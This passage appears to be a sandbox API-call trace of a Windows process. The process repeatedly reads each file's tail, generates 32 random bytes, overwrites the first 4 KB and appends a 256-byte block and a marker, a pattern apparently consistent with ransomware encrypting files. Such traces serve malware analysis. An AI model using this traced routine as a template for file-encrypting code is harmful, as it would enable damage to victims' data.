Size=0x200) returned 0x7d397d0 [0086.798] GetProcessHeap () returned 0x4f10000 [0086.798] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.798] GetProcessHeap () returned 0x4f10000 [0086.798] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.798] GetProcessHeap () returned 0x4f10000 [0086.798] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.798] GetProcessHeap () returned 0x4f10000 [0086.798] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.798] GetProcessHeap () returned 0x4f10000 [0086.798] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.798] GetProcessHeap () returned 0x4f10000 [0086.798] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.798] GetProcessHeap () returned 0x4f10000 [0086.798] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.798] GetProcessHeap () returned 0x4f10000 [0086.798] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0086.798] GetProcessHeap () returned 0x4f10000 [0086.798] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.798] GetProcessHeap () returned 0x4f10000 [0086.798] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0086.798] GetProcessHeap () returned 0x4f10000 [0086.798] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0086.798] GetProcessHeap () returned 0x4f10000 [0086.798] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0086.798] GetProcessHeap () returned 0x4f10000 [0086.799] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0086.799] SetFilePointerEx (in: hFile=0xa10, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.799] WriteFile (in: hFile=0xa10, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0086.799] WriteFile (in: hFile=0xa10, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0086.799] GetProcessHeap () returned 0x4f10000 [0086.799] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0086.799] GetProcessHeap () returned 0x4f10000 [0086.799] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0086.799] GetProcessHeap () returned 0x4f10000 [0086.799] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0086.799] CloseHandle (hObject=0xa10) returned 1 [0086.801] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 166 [0086.801] SetFilePointerEx (in: hFile=0xa14, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.801] ReadFile (in: hFile=0xa14, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0086.801] SetFilePointerEx (in: hFile=0xa14, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.801] GetProcessHeap () returned 0x4f10000 [0086.801] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0086.801] GetProcessHeap () returned 0x4f10000 [0086.802] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0086.802] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0086.802] GetProcessHeap () returned 0x4f10000 [0086.802] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0086.802] ReadFile (in: hFile=0xa14, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0087.110] SetFilePointerEx (in: hFile=0xa14, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.110] WriteFile (in: hFile=0xa14, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0087.110] GetProcessHeap () returned 0x4f10000 [0087.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0087.110] GetProcessHeap () returned 0x4f10000 [0087.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0087.110] GetProcessHeap () returned 0x4f10000 [0087.110] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0087.110] GetProcessHeap () returned 0x4f10000 [0087.110] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0087.110] GetProcessHeap () returned 0x4f10000 [0087.111] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.111] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.111] GetProcessHeap () returned 0x4f10000 [0087.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0087.112] GetProcessHeap () returned 0x4f10000 [0087.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0087.113] GetProcessHeap () returned 0x4f10000 [0087.113] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0087.113] GetProcessHeap () returned 0x4f10000 [0087.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0087.113] GetProcessHeap () returned 0x4f10000 [0087.113] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0087.113] GetProcessHeap () returned 0x4f10000 [0087.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0087.113] GetProcessHeap () returned 0x4f10000 [0087.113] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.113] GetProcessHeap () returned 0x4f10000 [0087.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0087.113] GetProcessHeap () returned 0x4f10000 [0087.113] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.113] GetProcessHeap () returned 0x4f10000 [0087.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.113] GetProcessHeap () returned 0x4f10000 [0087.113] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.113] GetProcessHeap () returned 0x4f10000 [0087.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.113] GetProcessHeap () returned 0x4f10000 [0087.113] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.113] GetProcessHeap () returned 0x4f10000 [0087.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.113] GetProcessHeap () returned 0x4f10000 [0087.113] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.113] GetProcessHeap () returned 0x4f10000 [0087.113] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.113] GetProcessHeap () returned 0x4f10000 [0087.113] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.114] GetProcessHeap () returned 0x4f10000 [0087.114] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.114] GetProcessHeap () returned 0x4f10000 [0087.114] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.114] GetProcessHeap () returned 0x4f10000 [0087.114] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.114] GetProcessHeap () returned 0x4f10000 [0087.114] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.114] GetProcessHeap () returned 0x4f10000 [0087.114] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.114] GetProcessHeap () returned 0x4f10000 [0087.114] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.114] GetProcessHeap () returned 0x4f10000 [0087.114] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.114] GetProcessHeap () returned 0x4f10000 [0087.114] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.114] GetProcessHeap () returned 0x4f10000 [0087.114] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.114] GetProcessHeap () returned 0x4f10000 [0087.114] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.114] GetProcessHeap () returned 0x4f10000 [0087.114] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.114] GetProcessHeap () returned 0x4f10000 [0087.114] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.114] GetProcessHeap () returned 0x4f10000 [0087.114] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.114] GetProcessHeap () returned 0x4f10000 [0087.115] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.115] GetProcessHeap () returned 0x4f10000 [0087.115] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.115] GetProcessHeap () returned 0x4f10000 [0087.115] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0087.115] GetProcessHeap () returned 0x4f10000 [0087.115] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.115] GetProcessHeap () returned 0x4f10000 [0087.115] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0087.115] GetProcessHeap () returned 0x4f10000 [0087.115] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0087.115] GetProcessHeap () returned 0x4f10000 [0087.115] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0087.115] GetProcessHeap () returned 0x4f10000 [0087.115] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0087.115] SetFilePointerEx (in: hFile=0xa14, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.115] WriteFile (in: hFile=0xa14, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0087.115] WriteFile (in: hFile=0xa14, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0087.115] GetProcessHeap () returned 0x4f10000 [0087.115] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0087.115] GetProcessHeap () returned 0x4f10000 [0087.115] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0087.115] GetProcessHeap () returned 0x4f10000 [0087.115] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0087.115] CloseHandle (hObject=0xa14) returned 1 [0087.117] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 167 [0087.117] SetFilePointerEx (in: hFile=0xa18, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.117] ReadFile (in: hFile=0xa18, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0087.117] SetFilePointerEx (in: hFile=0xa18, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.117] GetProcessHeap () returned 0x4f10000 [0087.117] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0087.117] GetProcessHeap () returned 0x4f10000 [0087.118] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0087.118] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0087.118] GetProcessHeap () returned 0x4f10000 [0087.118] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0087.118] ReadFile (in: hFile=0xa18, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0087.169] SetFilePointerEx (in: hFile=0xa18, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.169] WriteFile (in: hFile=0xa18, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.170] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.170] GetProcessHeap () returned 0x4f10000 [0087.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.171] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.171] GetProcessHeap () returned 0x4f10000 [0087.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.172] GetProcessHeap () returned 0x4f10000 [0087.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.172] GetProcessHeap () returned 0x4f10000 [0087.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 